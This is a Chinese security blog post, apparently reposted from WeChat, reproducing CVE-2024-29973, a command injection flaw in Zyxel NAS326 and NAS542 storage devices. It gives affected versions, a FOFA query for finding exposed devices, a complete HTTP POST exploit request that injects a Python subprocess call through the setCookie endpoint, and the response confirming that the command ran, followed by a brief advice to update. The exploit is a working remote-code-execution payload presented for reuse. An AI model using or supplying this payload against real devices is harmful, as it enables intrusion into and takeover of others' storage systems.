CVE-2024-29973 漏洞复现

admin 2024年7月2日23:41:47评论5 views字数 1251阅读4分10秒阅读模式

01

漏洞名称

Zyxel NAS326和Zyxel NAS542 操作系统命令注入漏洞

02

漏洞影响

Zyxel NAS326 V5.21(AAZF.17)C0之前版本
NAS542 V5.21(ABAG.14)C0之前版本

03

漏洞描述

Zyxel NAS542和Zyxel NAS326都是中国合勤(Zyxel)公司的产品。Zyxel NAS542是一款NAS(网络附加存储)设备。Zyxel NAS326是一款云存储 NAS。Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞,该漏洞源于setCookie参数中存在命令注入漏洞,从而导致攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令。

04

FOFA搜索语句

app="ZYXEL-NAS326"

CVE-2024-29973 漏洞复现

05

漏洞复现

向靶场发送如下数据包,注入命令echo 2iAmlSBVJT3BC3sr0ygos7Fj2hx

POST /cmd,/simZysh/register_main/setCookie HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36Connection: closeContent-Length: 255Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwteiAccept-Encoding: gzip

------WebKitFormBoundarygcflwteiContent-Disposition: form-data; name="c0"

storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("echo 2iAmlSBVJT3BC3sr0ygos7Fj2hx", shell=True)#------WebKitFormBoundarygcflwtei--

响应内容如下,包含2iAmlSBVJT3BC3sr0ygos7Fj2hx字符串

HTTP/1.1 200 OKConnection: closeContent-Length: 78Content-Type: application/jsonDate: Fri, 21 Jun 2024 03:51:48 GMTServer: Apache

{"errno0": 0, "errmsg0": "OK", "zyshdata0": ["2iAmlSBVJT3BC3sr0ygos7Fj2hxn"]}

漏洞复现成功

06

修复建议

建议您更新当前系统或软件至最新版,完成漏洞的修复。

原文始发于微信公众号(AI与网安):CVE-2024-29973 漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月2日23:41:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-29973 漏洞复现https://cn-sec.com/archives/2871207.html

发表评论

匿名网友 填写信息